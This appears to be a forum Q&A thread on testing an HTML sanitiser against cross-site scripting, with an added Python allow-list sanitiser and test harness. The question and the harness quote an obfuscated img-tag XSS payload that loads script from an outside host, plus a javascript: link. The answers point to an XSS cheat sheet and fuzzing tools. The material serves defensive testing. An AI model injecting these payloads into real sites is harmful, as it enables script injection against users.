Hi,

I'm looking to write an HTML sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror:

<img src=""http://www.a.com/a.jpg&lt;script type=text/javascript 
src="http://1.2.3.4:81/xss.js"&gt;" /><<img 
src=""http://www.a.com/a.jpg&lt;/script&gt;"

I know there's a Mime Torture Test which comprises several nested emails with attachments that's used to test Mime decoders (if they can decode it properly, then they've been proven to work). I'm basically looking for an equivalent for XSS, i.e. a list of examples of dodgy HTML that I can throw at my sanitiser just to make sure it works OK.

If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.

Thanks in advance :-)

Edit: Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.
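An added example, not part of the question or of any answer: a minimal allow-list sanitiser in Python together with the kind of torture-test harness the question asks for, using the Coding Horror payload quoted above as its first case. The tag and attribute allow-lists, the URL scheme check and the `leaks_script` invariant are assumptions about policy made for this example, not anything the thread specifies.

```python
import html
import re
from html.parser import HTMLParser

# Allow-list policy: anything not named here is dropped rather than "fixed up".
ALLOWED_TAGS = {"p", "b", "i", "br", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = ("http://", "https://")   # URL allow-list: rejects javascript:, data:, vbscript:

class AllowListSanitiser(HTMLParser):
    # Re-serialises only allowed tags and attributes; all text is re-escaped on output.
    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities are decoded, so output re-escapes
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:   # <script>, unknown and malformed tags vanish
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue              # anything not allow-listed (on*= included) is dropped
            if name in ("href", "src") and not value.strip().lower().startswith(SAFE_SCHEMES):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
    handle_startendtag = handle_starttag   # <img .../> becomes <img ...>, not <img></img>
    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)
    def handle_data(self, data):
        self.out.append(html.escape(data, quote=False))   # text can never open a tag

def sanitise(markup):
    p = AllowListSanitiser()
    p.feed(markup)
    p.close()   # an unterminated trailing tag is flushed as (escaped) text
    return "".join(p.out)

# Coarse invariant for every torture case: no script tag, on* handler or
# javascript: URL inside any tag the sanitiser emitted.
def leaks_script(output):
    return any(t.startswith("<script") or "javascript:" in t or re.search(r"\son\w+\s*=", t)
               for t in re.findall(r"<[^>]*>", output.lower()))

# Constructed torture cases; the first is the Coding Horror payload quoted in the question.
TORTURE = ['<img src=""http://www.a.com/a.jpg&lt;script type=text/javascript \n'
           'src="http://1.2.3.4:81/xss.js"&gt;" /><<img \nsrc=""http://www.a.com/a.jpg&lt;/script&gt;"',
           '<a href="javascript:alert(1)">x</a>']
BENIGN = '<p>Hello <b>world</b> &amp; <a href="https://example.com/">link</a></p>'

def torture_results():   # [(case, sanitised output, leaked?)] for a unit test to assert on
    return [(c, sanitise(c), leaks_script(sanitise(c))) for c in TORTURE]
```

A unit test then asserts that no case leaks and that benign markup such as `BENIGN` survives unchanged, so the sanitiser is checked in both directions: nothing dangerous gets through and nothing harmless is stripped.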

+12  A: 

Take a look at this XSS Cheat List : http://ha.ckers.org/xss.html

RealHowTo
Specifically the "XML format of the XSS Cheat Sheet", which I missed the first time I saw that page.
dbr
+6  A: 

XSS Me is a great Firefox plugin you can run against your sanitizer.

The link to "XSS Me" is formatted wrong... The correct URL is https://addons.mozilla.org/en-US/firefox/addon/7598
Patjoh
Link corrected. Thanks for pointing it out!
+2  A: 

Check out OWASP. They have good guidance on how XSS works, what to look for, and even the WebGoat project, where you can try your hand on a vulnerable site.

erickson
+2  A: 

You might try Jesse Ruderman's jsfunfuzz (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/) that throws random data at your JavaScript trying to break it. It seems the Firefox team has used this with great success.

Eric Wendelin
A: 

I know Yahoo! (I think Rasmus Lerdorf wrote it) had a utility for stress testing applications (XSS, SQL and a lot more). I think it was released and then retracted, seeing as I haven't been able to find it anywhere.

Ross